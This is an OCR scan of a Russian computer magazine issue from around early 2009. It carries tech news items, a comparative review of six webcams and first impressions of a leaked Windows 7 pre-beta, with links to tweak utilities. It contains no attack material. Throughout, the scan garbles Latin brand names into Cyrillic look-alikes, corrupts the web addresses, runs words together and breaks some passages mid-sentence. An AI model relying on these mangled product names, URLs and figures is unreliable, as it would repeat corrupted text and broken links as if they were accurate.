который искренне и безвозмездно живёт им. Эти люди делают нашу жизнь ярче и 
интересней, они стирают границы и рушат стереотипы. Мы поддерживаем их уже 
более 16 лет. Теперь для этого существует ЕпГГіизіазГ ІпГегпеГ Аѵѵагб. 
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СПОНСОР КАТЕГОРИИ АВТО 



СПОНСОР КАТЕГОРИИ ОАМІЫО СПОНСОР КАТЕГОРИИ АУДИО 
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Самый распространи 

« 123456 » 



іь в Сети это « 1234567 . На втором месте — 



Продешевили? 





Под одну гребенку 

Скоро станет совершенно не важно, знал ты о том, что пользуешься 
пиратской копией программы, или не знал — перед лицом суда это не 
будет иметь никакого значения. Статья 1 250 Гражданского Кодекса РФ 
(«Защита интеллектуальных прав») вступила в силу еще 1 -го января 
2008, нотолько сейчас пленумы Верховного и Высшего арбитражного 
судов подготовили проект постановления, разъясняющего ее суть. И 
получилось следующее: незнание не освобождает от ответственности 
и не гарантирует никаких «поблажек». Болеетого, если раньше это 
распространялосьтолько на юридических лиц, то теперь касается и 
лиц физических, то есть, простых граждан — нас. Активно штрафовать 
и приговаривать собираются традиционно за использование контра- 
факта, осознанное или неосознанное, за размещение и скачивание 
нелегальных файлов в локальных сетях, на различныххостингах и так 
далее. Проблему поиска нарушителей закона планируется решить 
давлением на владельцев хостингов и сеток, которых отнынетоже 
можно привлекать к ответственности. Кпримеру, получается, чтототже 
ѴоиТиЬе и подобные ему видео-хостинги, которые в качестве глав- 
ного аргумента всегда предъявляли невозможность контролировать 
все материалы, закачиваемые юзерами на сайт, все равно понесут за 
контрафакт ответственность — ведь неважно, была компания в курсе 
нарушения или нет. 




Похоже, компания Ѵабоо! перестаралась, набивая себе цену в глазах 
МісгозоЛ. Переговоры о возможной сделке между гигантами то 
заходили в тупик, то снова возобновлялись. М іеговой предлагал 
$47.5 млрд., но этого Уабоо! показалось недостаточно. Точно также в 
середине 2008 было отвергнуто предложение МісгозоЛ о покупке если 
не всей компании, то хотя бы ее поискового бизнеса. Атеперь, когда 
дела у Уабоо! идут все хуже (компанию покинул один из главных разра- 
ботчиков Шон Сачтер, а в ноябре 2008 в отставку подал генеральный 
директор и основатель Джерри Янг], переговоры по покупке поиско- 
вого бизнеса Ѵабоо! снова возобновились. И теперь стороны, похоже, 
наконец, достигли консенсуса. Правда, сумма сделки стала куда как 
более скромной — активы оцениваются в $20 млрд. Судя потому, что в 
МісгозоЛуже думаюто новых кадрах и прочатна руководящие посты 
экс генерального директора АОІ_ — Джонатана Миллера и экс главу 
Рох ІпІегасЛѵе Мебіа — Росса Левинсона, сделку, фактически, можно 
считать состоявшейся. МісгозоЛ все же добилась своего. 




512 Гб на 8 БО 

Если миниатюризация устройств для хранения данных и 
дальше будет развиваться в том же духе, то лет через 10 
несколько терабайт можно будетхранить на носителе меньше 
спичечного коробка, а флешки придется искать на столе с 
лупой. Ну а пока компания ТозЫЬа объявила о скором начале 
производства новой линейки 550-накопителей объемом 64, 

1 28, 256 и 51 2 Гб. Все устройства, кроме самого емкого на 51 2 
ГБ, размерами не превысят 1 .8". Топовая модель получилась 
чуть «полнее» — 2.5". Благодаря улучшенному МБС-контрол- 
леру, скорость новыхустройств отТозЫЬа составит 240 Мб\с в 
режиме чтения и 200 Мб\с в режимезаписи. Помимо прочего, 
все девайсы будут оснащены функцией АЕ5-шифрования. 
Цена и дата поступления устройств в продажу пока неизвест- 
ны, зато известно, что начать их производство планируется 
уже весной 2009. 
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Праздник к нам приходит 

Любители предпраздничных онлайновых распродаж были сильно огорчены ситу- 
ацией, сложившейся вокруг сайта ЕВау. В ходе праздничной акции крупнейший 
сетевой аукцион традиционно предложил своим покупателям множество лотов по 
совершенно смешным ценам, казалось бы — торгуйся, не хочу. Только вот боль- 
шинствотоваров достались отнюдь нелюбителям сетевого шоппинга, а сообра- 
зительным хакерам и программерам, которые с помощью всяческих скриптов, 
снайпер-программ и так далее выиграли сотни лотов. Что характерно, с молотка 
ушли даже те позиции, на страницах которых счетчик посещений показывал 0000. 
Судя по всему, информация о распродажах попала в руки кушлым перекупщикам 
еще до официального объявления и старта акции. Руководство аукциона никакого 
криминала в этих действиях, тем не менее, неусмотрело. Запрета на использова- 
ние утилит для поиска по разделам на ЕВау не существует, прямых нарушений и 
взломов тоже выявлено не было, так что, по сути, «кто не успел — тот опоздал». 










■ вы- 



вести от Мелкомягких 




От софтверного гиганта уровня Місгозо^ новости регулярно поступают в 
таких объемах, что если описывать их все, не хватит никакого журнала. 
Однако никто не мешает нам сделать выжимку. Итак — п ре-бету ѴѴіпсІоѵѵз 
7 уже показывают прессе, демонстрируя отсутствие сбоев и лагов, новые 
возможности интерфейса и обученный проигрывать новые форматы 
медиаплеер. В системе появится центр управленияустройствами Оеѵісе 
5Еаде, менюшка «Пуск»обрастетсписками Оиппр Бізіз. Также внедрят 
новую технологию ѴѴіпсІоѵѵз АбѵапсесІ Разіегігайоп РІаіТогт (ѴѴАРР), 
позволяющую работать с ОігесіХ 10 и 10.1 на машинах без графического 
ускорителя — его обязанности возложат на ЦП и эмулятор. Отдельно от 
всего этого великолепия будет доступен пакет полезностей ѴѴіпсІоѵѵз Біѵе, 
который обещаютобновлять гораздо чаще самой ОС. Релиз ѴѴіпсІоѵѵз 7 
исходно был запланирован так, чтобы система появилась через три года 
после выхода Ѵігіа, то есть примерно в начале 2010-го. Бета-версия, впро- 
чем, ожидается уже в этом месяце — в январе 2009. Что интересно, у беты 
будет наличествовать и русский язык. 

Тем временем, для Ѵізѣа вышла бета-версия Зегѵісе Раск 2. Чтобы 
поставить пакетобновлений, какобычно понадобится сама ѴізЕа суже 
установленным 5Р1 . Финальную версию 5Р2 обещают в первой половине 
2009 года. Ранее в пресс-релизах фигурировал апрель, но, похоже, второй 
сервис паквыйдет раньше. 
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Авс- 
тралия не 
только родина 
кенгуру, но с недавних 
пор еще и одна из немногих 
стран, где имеет место интернет- 
цензура со стороны правительства. Летом 
2008 власти страны выделили $82 млн. на создание 
национального веб-фильтра и сейчас готовы приступить 
кего тестированию. Система призвана блокировать доступ к 



нелегальным сайтам, которых в состав- 
ленном правительственными чинами 
закрытом списке почти 10.000. Боль- 
шую его часть, по словам властей, 
занимаютпорно-сайты (притом, 
речь идет о детском порно] и 
сайты, имеющие отношение 
ктеррористическим и экстре- 
мистским организациям. Однако авс- 
тралийцы все равно опасаются, что заодно 
им прикроют доступ и кдругим ресурсам, носящим 
спорный характер. Такие скользкие темы как эвтаназия 
или азартные игры тоже могут подвергнуться «выбраковке». По 
исходной задумке правительства, веб-фильтр должны были тести- 
ровать местные провайдеры, но недовольство среди них растет. Так, 
крупнейший поставщик интернета в Австралии — Теізіга, поближе 
познакомившись с детищем властей, вообще отказался принимать 
участие в тестировании. Вслед за этим последовал еще ряд отказов, а 
многие согласились уста но вить лишь минимальную фильтрацию. Ра- 
зумеется, правительство это не остановит, тестирование они проведут 
в любом случае. Но пользователи и провайдеры уже планируют в ответ 
проведение крупных акций протеста в Мельбурне и Сиднее. Иници- 
атива властей совершенно не радуетавстралийцев, и все больше 
людей выступаютза полное закрытие этой программы. 



Смени браузер! 
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Компания боодіе, совсем недавно выпустившая в светфинальную 
версию своего браузера боодіе СЬготе, перешла в наступление. Кон- 
курентам «Хрома», и так моментально завоевавшего солидный процент 
рынка, не поздоровится. Теперь при визите в Отаіічерез веб-интер- 
фейс наверху окна несложно заметить (или скорее, сложно не заметить) 
красную надпись: «Сделайте Стаііеще быстрее». Не видят эту ссылку 
только пользователи самого СЬготе и еще, отчего-то, приверженцы 
Орега. Наверное, оттого, что доля рынка Орегауже составляет мень- 
ше, чем доля СЬготе — 0.71% против 0.83%. Остальные же, пройдя по 
ссылке, обнаружатсправочную страницу с предложением скачать более 



современный браузер — ЕігеІохЗ или СЬготе. Все это, разумеется, 
подается под соусом ускорения работы Отаіі. С пользователями ІЕ ситу- 
ация, вообще, на грани комичной. Тем, у кого установлена версия ниже 
7-й версии, предложат 7-ю (конечно, со встроенным тулбаром боодіе 
и их же поиском по умолчанию). А тем, чья версия актуальна, напишут 
стыдливое: «Более быстрая версия Іпіюгпеі Ехріогег, ІЕ8, находится в 
разработке и доступна в виде бета-версии» — и опятьже предоставят 
выбор: ЕігеІохЗ или ббготе. Установка ббготеуже предлагается и 
вместе со скачиванием боодіе Еагіб. Вотуждействительно агрессив- 
ный пиар! 
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Клавиатура 

наоборот 

Сегодня подобрать удобное уст- 
ройство ввода не проблема. Спектр 
всевозможных клавиатур широк 
— эргономичные, геймерские, са- 
мостерилизующиеся, с подсветкой и 
без, проводные и беспроводные. Но 
изобретать колесо производители не 
особенно стремятся, обычно «клави- 
атура», так сказать, остается собой. 

Но ведь никто не говорил, что нельзя 
придумать ничего удобнее, верно? Вот, 
например, странный девайс по имени 
бгіррііу. По сути, это обычная ОѴѴЕВТУ-клавиатура без цифро- 
вого блока. И все бы ничего, только кнопки у нее расположены с 
обратной (задней] стороны. Создатели уверяют, что набиратьтекст 
таким образом гораздо легче и удобнее, чем на обычной клавиа- 
туре. Разумеется, речь идет об использовании Сгіррііу с портатив- 
ными устройствами, ведь работать придется на весу, а на обычном 
рабочем месте это вряд ли будетудобно, да и не потребуется. В 
продажу девайс должен поступить через полгода. Цена на киборд 
составит порядка $100, такчтоу необычной новинки определенно 
есть шанс найти своих пользователей. 





АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Спвцнальное предлежание: 

ТСПрГППМ ИНТЕРНЕТ 

К. Л К. Ч* и N гіодиПйчЕни* БЕСПЛАТНО 



Бренды тоже 
умирают 
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Печальная новость пришла из стана производителей «железа». 
Хорошо известная всем, а особенно оверклокерам, компания АЬМ: 

— производитель надежнейших материнских плат и видеоадап- 
теров — приказала долго жить. Проблемы уАЬіІ начались давно, 
еще в 2004 году. Тогда из-за неприятностей по бухгалтерской 
части компания сильно потеряла в цене на Тайваньской фон- 
довой бирже. Популярность продуктов стала падать, из-за чего 
пришлось сначала отказаться от производства видеокарточек, 
азатем компанию и вовсе поглотил другой тайваньский вендор 

— ІІпіѵегзаІБсіепббс ІпсІизІхіаЦіІЗІ]. Под крылом 1151 дела у АЬМ: 
лучше не пошли, почти все ведущие разработчики разбежались, 
и продажи упали совсем. Последние годы АЬИ: с трудом перебива- 
лись выпуском цифровых фоторамок со встроенным принтером, и 
это, понятное дело, золотых гор не приносило. В итоге, от мертвого 
груза решили избавиться. С 1 -го января 2009 года АЬіІ: официаль- 
но прекратила свое существование. 



* Коптнмг, услуги сізЬп - центра 
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АЛЕКСЕЙ ШУВАЕВ 



СМОТРИ 



г льтимедиа повсюду! Слышать собеседника и в самолете, и в поезде уже не 



читается чем-то необычным. Менее привычно пок 



ить и одновременно 



идетъ человека на том конце «провода». Сегодня мы рассмотрим шесть совре 



енных камер для передачи видео через интернет, 
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г ВОЗМОЖНОСТИ УСТРОЙСТВ 

Девайсы, представленные в нашем обзоре, обладаютмногими полезны- 
ми качествами. Например, еслиты хочешьустроить видеоконференцию, 
тебе достаточно подключить камеру и скачать какой-либо из популяр- 
ных интернет-пейджеров. Наилучшим образом себя зарекомендовала 
программа Экуре — какнаиболеезаточенная для разговоров голосом и 
передачи видео, но с этой задачей с переменным успехом справляются 
также ІСО, Маіі-агентиуабоо-теззепдег. Вероятно, есть еще множество 
утилит, но мы привели наиболее распространенные примеры. Сразу 
напомним о разумном минимуме скорости передачи данных — это 128 
кбит/с. Ты можешь общаться и на меньших скоростях, но тогда задержек 
при передаче изображения и искажения голоса не избежать. Как прави- 
ло, программы передают изображение разрешением не более 640x480 
пикселей. Дальнейшее наращивание матрицы — это больше игры 
маркетологов, хотя разница в изображении может быть заметна, так как 
качество матрицы и начинка различаются. Также в Сети есть сервисы, где 
можно просто общаться и демонстрировать свое изображение онлайн, 
без применения стороннего софта. Например, на сайте зтоігі.сотт ы мо- 
жешь разрешить доступ ксвоей камере, чтобы все пользователи видели 
твое изображение. 

Крометого, имеются и нестандартные способы использования ѵѵеЬ- 
камер. Скажем, организовать охранную систему видеонаблюдения. При 



помощи специального софта можно фиксировать все происходящее 
в зоне видимости камеры. Для экономии дискового пространства и 
удобства последующего просмотра такие программы активируют запись 
только в случае появления в видимой зоне движения. Среди вариантов 
применения — следить за своим домом. Например, мой друг, уходя на 
работу, оставляет компьютер включенным. Настроив Экуре на автоответ, 
он может позвонить себе домой и увидеть и услышать, что там происхо- 
дит. 

В МЕТОДИКА ТЕСТИРОВАНИЯ 

Для теста выбрана программа Экуре. Чтобы не было помех при пере- 
даче изображения, мы воспользовались каналом в 10 Мбит/с. Вполне 
хватит для двустороннего видеочата! Тестируя чувствительность 
матрицы, мы создали слабое освещение. Камеры подключались к 
системе с предустановленной ѴѴіпсІоѵѵзХР Рго!еззіопаІ 5РЗ без уста- 
новки драйверов. Если они не требовали специального софта — это 
считалось преимуществом. Также оценивались дополнительные 
возможности устройств, будь то встроенный микрофон или подсветка. 
Важным мы сочли и удобство крепления (особенно с учетом разной 
ширины ЖК-мониторов или наличия ЭЛТ-экрана). Напоследок, мы 
оценивали комплектацию устройств — ведь очень удобно, когда в 
коробку с покупкой вкладывают гарнитуру или наушники. 
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Сгеаііѵе Ыѵе! 



Сат Кіоіекзоок Шіга 

Технические характеристики:! 



0епіи5ІБІіт32іР 

Технические характеристики:! 



Разрешение матрицы: 1,3 Мпикс 
Разрешение видео:128охЮ24 

Разрешение фото: 5 МПикс (с программной интерполяцией) 

Частота кадров: 30 кадров/с 
Интерфейс с компьютером: ІІ5В2.0 



Разрешение матрицы: 0,3 Мпикс 
Разрешение видео: 640 x 480 

Разрешение фото: 0,3 МПикс (с программной интерполяцией) 

Частота кадров: 30 кадров/с 
Интерфейс с компьютером: ІІ5В2.0 



750 руб. 



2300 руб. 



Девайсы отСгеабѵе, вполне соответствуя названию, всегда отличались 
креативом. Ну и высоким качеством изготовления. Фирма, просла- 
вившаяся своими аудиокартами, уже давно и суспехом занимается 
сторонними продуктами. Сегодня в наших руках — камера несколько 
необычного вида: цилиндрической формы, чуть больше батарейки, 
вращается вокруг оси в одной плоскости. Из-за странного крепления на 
обычный ЖК-монитор закрепить ее удалось лишь после ряда усилий. 
Сразу порадовало изображение — широкоугольный объектив несильно 
искажает картинку и позволяет захватить больше пространства. Всю 
работупо наведению резкости изображения за тебя сделает автофокус. 
При работе камера мягко светитсиним светодиодом. Очень понравился 
встроенный микрофон — качество звука было отличным. Если хочешь 
сделать разговор приватным — воспользуйся идущей в комплекте 
стереогарнитурой. Надо отметить и несколько недостатков: провод 
камеры довольно короткий, а удлинителя И5В в комплекте нет— расчет 
велся явно на обладателей ноутбуков. При слабом освещении заметно 
появление шумов (в видеточекна изображении). Камера не работает 
без установки драйверов. Кдостоинствам относится хорошее изображе- 
ние при достаточной освещенности, отличный встроенный микрофон и 
стереогарнитура. 



•••••ООООО 

Компания Вепіиз отметилась в производстве практически всех 
околокомпьютерныхустройств, и веб-камеры не стали исключением. 
Простенький девайс можно закрепить на ЖК-дисплее или поставить на 
горизонтальную плоскость. Затруднение при фиксации может вы- 
звать слабый зажим и малый вес — камера просто сдвигается. Гаджет 
очень компактный и подойдет обладателям ноутбуков (практически 
не занимает места в багаже). Получить картинку и звук со встроенных 
микрофонов реально даже без установки фирменного ПО, нотогда не 
удастся воспользоваться всеми функциями. Приятная фишка заключа- 
ется в том, что в корпус встроены четыре инфракрасных светодиода, а 
значит, ты сможешь получать изображение в полной темноте. Правда, 
маломощные элементы не светят дальше одного метра. И еще, — све- 
тодиодная подсветка работает толь ко после установки драйвера. Фокус 
регулируется при помощи поворота объектива, потому забудь про четкие 
линии, если сместишься на метр назад. Из недостатков было отмечено 
невысокое качество звука при пользовании встроенным микрофоном. 
Крометого, при обычном освещении цветность картинки серьезно 
хромает, как мы ни пытались ее настроить. Ну а достоинства: малая цена, 
возможность съемки в полной темноте. 
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Негсиіез йеіихе Оріісаібіаззі 

Технические характеристики:И 



Разрешение матрицы: 1,3 Мпикс 
Разрешение видео: 800x600 

Разрешение фото: 1,3 МПикс (с программной интерполяцией) 

Частота кадров: 30 кадров/с 
Интерфейс с компьютером: ІІ5В2.0 



Негсиіез йиаіріх СНаІапс)5Ноѵѵ| 

Технические характеристики:И 



Разрешение матрицы: 1,3 Мпикс 
Разрешение видео: 1280x1024 

Разрешение фото: 5 МПикс (с программной интерполяцией) 

Частота кадров: 30 кадров/с 
Интерфейс с компьютером: ІІ5В2.0 



ООО 
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Производитель использовал для объектива стекло — якобы это должно 
существенно улучшить качество картинки. И действительно, сей шаг не- 
плохо сказался на изображении, правда, фокусировка осталась ручная, 
а само кольцо фокуса оченьузкое и скользкое — неудобно перенастра- 
ивать. Камера оснащена прищепкой (на одной из сторон — липучка для 
крепления на ЭЛТ-мониторах] и шарнирным креплением, что позволяет 
расположить ее практически, какугодно. На передней панели установ- 
лены четыре светодиода, которые можно включать и принудительно, и в 
автоматическом режиме. Светодиоды довольно яркие и могутосветить 
объекты на расстоянии до одного метра. Качество картинки при этом 
меняется в лучшую сторону. Имеется встроенный микрофон, но лучше 
воспользоваться идущей в комплекте моно-гарнитурой (микрофон 
дает заметный писк при работе]. Для полного функционала потребуется 
установить драйверы. Из достоинств отметим автоматическую подсвет- 
ку, хорошие линзы, удобное крепление и свободу вращения камеры, 
стильный дизайн, а также наличиежесткой гарнитуры в комплекте. К 
недостаткам относится плохой звук со встроенного микрофона. Никаких 
дополнительных фишек в комплект не входит. 




2200 руб. 



Занимательная камера в стильной обертке. В редакцию попала квад- 
ратная коробка, в которой, помимо самой камеры с необходимым ПО, 
находится моно-гарнитура и цифровой брелок. Начну с последнего. 
Очень интересный бонус — брелоксЖК-экраном и встроенной памя- 
тью на 2 Мб нужен для хранения любимых фотографий. Питается он от 
четырех маленьких батареек, а данные закачиваются по интерфейсу 
115В. Теперь перейдем к гарнитуре. Девайс с креплением на одно ухо 
имеет неплохой микрофон, но нужен, скорее, для сохранения при- 
ватности разговора, нежели для удобства. Крепление самой камеры 
создано для установки как на ЭЛТ, так и на ЖК-дисплеях. Фокусировка 
изображения происходит при повороте кольца объектива. В процес- 
сетестирования действительно четкое изображение получить так и 
неудалось. Камера имеет встроенный микрофон, который довольно 
заметно фонит при работе. Что важно, камера начала работать без 
установки драйверов: определились как сама камера, так и микрофон. 
При активации микрофона или камеры на панели девайса загорается 
светодиод, так что момент, когда за тобой начнут наблюдать, ты не про- 
пустишь. В итоге, к недостаткам можно отнести плохую резкость, шумы 
микрофона и периодический переход изображения в зеленый цвет. 

Из плюсов: работа без драйверов, встроенный микрофон, хороший 
брелок. 
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ЬодіІесИ ОиіскСа т БрИеге АР| 

Технические характеристикой 



Разрешение матрицы: 2 Мпикс 
Разрешение видео: 1600 x 1200 

Разрешение фото: 8 МПикс (с программной интерполяцией) 

Частота кадров: 30 кадров/с 
Интерфейс с компьютером: ІІ5В2.0 



Довольно известная и уже не новая камера от І_одіІесЬ. Девайс 
заслуживает всяческих похвал не только за особый дизайн, но и за 
техническую начинку. Во-первых, камера оснащена оптикой Са гі 2е ізз 
и автофокусом. Во-вторых, ты можешьуправлять поворотом камеры 
в вертикальной и горизонтальной осях. В-третьих, фирменное ПО 
позволяет следить за лицом — камера будетавтоматически следовать 
за тобой, если ты любишь двигаться при разговоре. В-четвертых, этот 
же софт позволяет за менять твое изображение на анимированных 
персонажей. Несомненным достоинством является возможность 
«приподнять» камеру над столом, смонтировав ее на 26-сантимет- 
ровую подножку. Во время активности камеры ты заметишь оранже- 
вый светодиод сбоку от объектива. Встроенный микрофон выдает 
неплохой звук, но учитывая, что он смонтирован в основании — если 
ты установишь его на столе, готовься, что он будет передавать и 
посторонние шумы. Оченьхорошо работает функция подстройки под 
окружающее освещение. Из недостатков отметим необходимость уста- 
новки фирменного ПО и пластиковую полусферу, которая накрывает 
оптический механизм — она может поцарапаться и качество картинки 
заметно ухудшится. 



МісгозоК І-ііеСа т ѴХ-| 

Технические характеристикой 



Разрешение матрицы: 0,3 Мпикс 
Разрешение видео: 640 x 480 

Разрешение фото: 1,3 МПикс (с программной интерполяцией) 

Частота кадров: 30 кадров/с 
Интерфейс с компьютером: 115В 2.0 

•••••••••О 

Инженеры МісгозоЛ выпустили достойный гаджет. Сразу надо обратить 
внимание на сменную лицевую панель — выбирай из трех цветов: белый, 
синий и красный (Риззіап есіібоп?). Камера с автофокусом выглядит 
оченьэлегантно и крепится на любой поверхности абсолютно без за- 
труднений. Микрофон не отличается высоким качеством, но слышимость 
вполне отчетливая. Что касается ка рти н ки , то тут камера заслуживает 
всяческих похвал: при любом освещении картинка оченьхорошая. И 
это несмотря на то, что камера оснащена 0,3 Мпикс матрицей. Еще одно 
достоинство, которое нельзя не назвать: все функции девайса доступны 
без установки драйверов. Для ценителей приватности: светодиод на 
лицевой стороне камеры начинает светиться, как только ты активируешь 
микрофон или запрашиваешь видео. Отметим также довольно длинный 
провод — подключить камеру можно даже к компьютеру, установленному 
под столом. Подведем итог. Положительные моменты: хорошее изоб- 
ражение, работа без установки ПО, сменные лицевые панели, провод. 
Недостатки: слабый микрофон, малое разрешение матрицы (хотя мало 
кто передает по Сети видео больше 640x480]. 



В ВЫВОДЫ 

Видеть собеседника всегда приятно, а использовать свой компьютер 
на все 1 00% — приятнее вдвойне. Поэтому, если ты еще не обзавел- 
ся ѵѵеЬ-камерой, то задумайся оее приобретении. А мы приступим к 
выдаче призов. Несомненным победителем становится камера І_оді1:есЬ 
ОиіскСат Зрбеге АР. За отличный функционал, качество и широкие 



возможности мы награждаем ее призом «Выбор Редакции». Второй 
приз, не менее важный («Лучшая покупка»), достается камере СгеаОѵе 
І_іѵе! Сат КІоіеЬоок Шга — за отличный звук и высокое качество изоб- 
ражения. Можно рекомендовать присмотреться и к МісгозоЛ ЫІеСат 
ѴХ-5500 — оченьудобный, стильный и функциональный девайс. Не 
пропусти! зс 
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ПЕРВЫЕ ВПЕЧАТЛЕНИЯ ОТ БЕТА-ВЕРСИИ НОВОЙ ВИНДЫ 



2010 года, однако ргеВеЩ-версия проекта уже ускользнула в Сеть! 



Не успели мы вдоволь обругать и охаять последнюю ѴІ5і:а, как Місгозо 



сделала полноценный анонс и даже провела презентацию абсолютно новой 



ОС 



— ѴѴіпсІоѵѵз 7. Шустро! Финальный релиз новинки намечен на январь 



Н КОДОВОЕ ИМЯ: В1.АСКС0МВ 

Может показаться, что ѴѴіпсІоѵѵз 7 — это самая «быстро приготовлен- 
ная» ОС МісгозоЙ. Действительно, после выхода ѴѴіпсІоѵѵз ХР до релиза 
Ѵіэіа прошло почти шесть лет. Совсем другая история с ѴѴі псіоѵѵз 7 
— всего лишьтри года до релиза. На самом деле, это предположение 



в корне неверно, а точнее, все выглядит наоборот. ѴѴіпсІоѵѵз 7 — самая 
долго разрабатываемая ОС от Мі егозой! Впервые о ней заговорили 
еще в начале 2000 года. Была информация, отом, что МісгозоЙ начали 
работать над проектом под кодовым именем ВІаскСотЬ с намеченным 
релизом на 2005 год, но в августе 2001 информация обновилась и было 
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сообщено, что перед ВІаскСотЬ будет выпущена промежуточная версия 
ОС — ѴѴіпсІоѵѵз БопдНогп, которую впоследствии переименовали в 
ѴІ5Іа. Буквально втоже время проекту ВІасксотЬ присвоили новое имя 
— Ѵіеппа. На основании этих фактов, выходит, что разработка ѴѴіпсІоѵѵз 7 
займет не три, а целых десять лет! 

Несмотря на наличие многочисленных билдов, Місгозоіі: не спешит 
раздаватьсвое новое детище в массовоетестирование. Поэтому все, что 
сейчас валяется на просторах инета, — нелегал и не рекомендуемые к 
использованию версии. Большинство из них не представляет никакого 
интереса; по сути, это слегка модифицированные версии Ѵізіа. Следо- 
вательно, особых отличий нет. Все изменилось с выходом РгеВеІа-вер- 
сии с номером Ьиіісі 6801 . Именно эту версию Місгозоіі: представила на 
конференции РОС, прошедшей в конце октября в Лос-Анджелесе. На 
презентации была представлена сборка 6933, но особо ярко в Сети за- 
светилась именно 6801 , в которой все примочки интерфейса отключены. 



Естественно, быстро подоспел патч, причем от нашего соотечествен- 
ника. Он исправил недоразумение. Буквально во время сдачи номера 
подоспел билд6956, который утекс конференции в Китае, а кмоменту 
выхода номера появится официальная бета. В общем, познакомиться с 
нововведениями ты сможешь в любом случае, какая бы версия Винды 
тебе ни попалась. 

Щ БЫСТРОДЕЙСТВИЕ 

За что только не ругали Висту — и за надоедливую систему защиты БАС, 
и проблему с драйверами, и причудливость интерфейса, но в особен- 
ности досталось производительности. Про излишнюю прожорливость 
и придирчивость по части системных ресурсов неупоминал только 
ленивый. Ребятам из Місгозоіі:, вероятно, такая народная позиция была 
не по душе, и они решили кое-что подправить. Уж не знаю, что они там 
подкрутили (возможно, просто отключили флаг«з1оѵѵ_\лгогк=оп»?], но 
ответственно заявляю: ѴѴіпсіоѵѵб 7 работает быстрее! Заметно быстрее! 
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• В Ѵізіа появился 
инструмент для 
создания записочек 
на рабочем столе. 
Когда записок скап- 
ливается сильно 
много, использо- 
вать их невозмож- 
но. В новой Винде 
вопрос частично 
решили, создав для 
них «подставку». 

Ты можешь лепить 
листки по старинке 
на рабочий стол, 
но когда он будет 
полностью загажен, 
просто нажми одну 
кнопку на подставке 
— все записки пе- 
реместятся на нее. 

• В системе появи- 
лисьтак называ- 
емые библиотеки 
(они же — ЫЬгагіез], 
совмещающие в 
себе несколько вы- 
бранных папок. При 
открытии библио- 
теки показывается 
их содержимое. Все 
папки добавляются 
в свойствах библио- 
теки, причем одна 
из папок — основ- 
ная. В нее происхо- 
дит копирование и 
сохранение файлов, 
когда вместо обыч- 
ной папки выбрана 
библиотека. 

• Если в системе 
несколько монито- 
ров, то управлять 
ими теперь намного 
проще. Аустанов- 
ки для проектора 
вообще вызываются 
горячей клавишей. 



Приятноеудивление вызывает даже процесс установки. 

На моем стареньком компе с достаточно древним Репбііт 
4установка заняла примерно полчаса (на инсталляцию 
финального релиза Ѵігіа уходило никак не меньше 40-45 
минут]. Но это ерунда в сравнении с быстродействием самой 
системы. Интерфейсу Аего больше не нужно время, чтобы 
при всех включенных эффектах хорошенько подумать, 
покурить и выпить кофе — и только после этого отрисовать 
нужное меню. Все работаеттак, как надо. 

Во времятестирования я работал с довольно ресурсоемки- 
ми приложениями (ѴізиаІЗШсІіо 2008, БефЫ 2009 ит.д.], при 
этом система моментально реагировала на все действия, не 
свопила и не билась в конвульсиях в мольбе отключить все 
«красивости». Хочется развести руками и спросить: «Парни, 
а чего же вы раньшетак не сделали?». 

Что касается загрузки ОС, то лично у меня она грузится 
столько же, сколько и Ѵізіа. Тут невольно вспоминаешь 
слова Стива Балмера отом, что хорошая ОС должна 
загружаться не более чем за 30 секунд. Вопрос: укладыва- 

Калькулятор для программеров 




ется ли в это время ѴѴіпсІоѵѵз 7? Нифига! Но пока сбросим 
это на то, что тестируемая версия — жесткая РгеВеіа, а не 
стабильная версия. Зато процедура завершения работы 
была сильно оптимизирована: выключение по сравнению с 
Ѵіз1:а происходитзначительно быстрее. Например, мой комп 
отключился буквально за 2-3 секунды. Похоже, «семерку» 
вполне можно будет использовать на нетбуках. Положитель- 
ные отзывы энтузиастов, не поленившихся установить ее на 
последние модели Азиз еееРС — тому подтверждение. 

В ИНТЕРФЕЙС 

Одной только оптимизации для выпуска новой ОС недоста- 
точно. Пользователям нужны фишки, интересные ново- 
введения. Основной новинкой ѴѴіпсІоѵѵз 7 в плане внешне- 
го вида однозначно является ЗирегВаг— подвергшаяся 
серьезным изменениям панельзадач. Теперь в ней не будет 
текста, только крупные иконки, а при наведении на иконку 
мышью будет всплывать списокоткрытых окон програм- 
мы. Раньше для ускорения доступа к часто используемым 
программам многие из нас выносили иконки в панель 
быстрого запуска. Теперь то же самое можно делать с одним 

Новая мордашка ѴѴіпсІоѵѵз Мебіа Ріауег 
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Новый центр безопасности 



После рассказа о хотя и небольших, но зато крайне приятных 
нововведениях в интерфейсе ѴѴіпсіоѵѵз 7, велико желание попро- 
бовать их уже сейчас. Одна проблема: до выхода релиза больше 
года, а текущая версия, несмотря на внешнюю стабильность, 
все равно имеет статус не просто беты, а пребеты. Как же быть? 
Попробовать на вкус некоторые из возможностей ѴѴіпсіоѵѵз 7 
вполне реально уже сегодня, всего лишь установив несколько 
небольших утилит. 

• Изменение размеров в соответствии с перемещением окна (пе- 
ретаскиваешь окно в верхней кромке экрана — окно развернется, 
тащишь вниз — примет исходный размер, к правому или левому 
краю — уменьшит окно до 50% от исходного размера; крайне 
удобно на широкоформатном мониторе) легко реализуется ути- 
литой Аего$пар Г ѵАѵѵѵ.аегозпар.сіе.ѵі ) . А еще хлеще управляться 
с окнами можно, благодаря тулзе ѴѴіпзрІіІ: Кеѵоіиіііоп (Чѵѵѵѵѵ. 
ѵѵішріщгеѵоіигіоп.сот) . 

• Улучшенную систему ІІАС, конечно, в Ѵізш не установить . Но 
вместо того, чтобы ее полностью отключать, лучше настроить 
под себя при помощи программы Ыогіоп’з И$ег Ассоши Сопігоі 

( ѵѵ^.погтпІаЬз.сот/іщЬеІаЬ/иас.рЬр ). 

• Что касается новой темы оформления, которая, вероятно, при- 
шлась тебе по душе, установить ее можно прямо сейчас. Ребята 
из проекта Ше Коскз Ыо§ практически полностью ее повторили, 
реализовав цветовую схему, иконки, ѵѵаіірарег, экраны загрузки 
и входа в систему. Закачать можно отсюда: мллА/ѵ.пігтаІЕѵ. 

сот /2008/11/07/ игапзбогт- ѵізна-ію-ѵѵіпсіоѵѵз- 7 . 

• Полноценной реализации фишки Аего Реек, значительно 
улучшившей нынешний таксбар, пока нет. Впрочем, превьюшки 
свернутых окон отлично показывает небольшая утилита Ѵізиаі 
ТазкТірз Гѵѵѵѵѵѵ.ѵізиаказкйрз.сот) . а перемещать по таскбару 
элементы позволяет Тазкіх Гшзкіх.гоЪшйіі.сот) . 



отличием — месторасположением иконок будет сама панельзадач. 
